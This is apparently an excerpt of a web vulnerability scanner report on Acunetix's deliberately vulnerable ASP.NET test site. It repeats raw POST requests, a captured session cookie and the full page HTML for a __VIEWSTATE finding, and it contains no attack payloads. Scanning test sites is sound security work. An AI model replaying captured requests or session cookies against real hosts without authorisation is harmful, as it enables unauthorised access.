Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8229&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAALaFiZNoIZGRkFVWY89ND4MWiF4yOEgn1U9D03s8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKl4IKjDwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DvE228Mbxj2e8g%2BkD2HJuY%2FH7XQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:46 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAALaFiZNoIZGRkFVWY89ND4MWiF4yOEgn1U9D03s8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKl4IKjDwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DvE228Mbxj2e8g+kD2HJuY/H7XQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:White" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1103 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,103 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8217&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAOKT0WtoIZGRkpNKC%2BCbl%2FT8Kh6POfuYqtCLK7hI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKNw%2BYYArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp%2FUCAuadp%2FUCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl%2BYFAuadl%2BYFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C%2B6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5D6ajA2voIDI%2FjCbkX6%2B6gLWhGPFH
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:07 GMT Content-Length: 12458
Response Body - size: 12,458 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAOKT0WtoIZGRkpNKC+Cbl/T8Kh6POfuYqtCLK7hI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKNw+YYArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5D6ajA2voIDI/jCbkX6+6gLWhGPFH" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:White" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
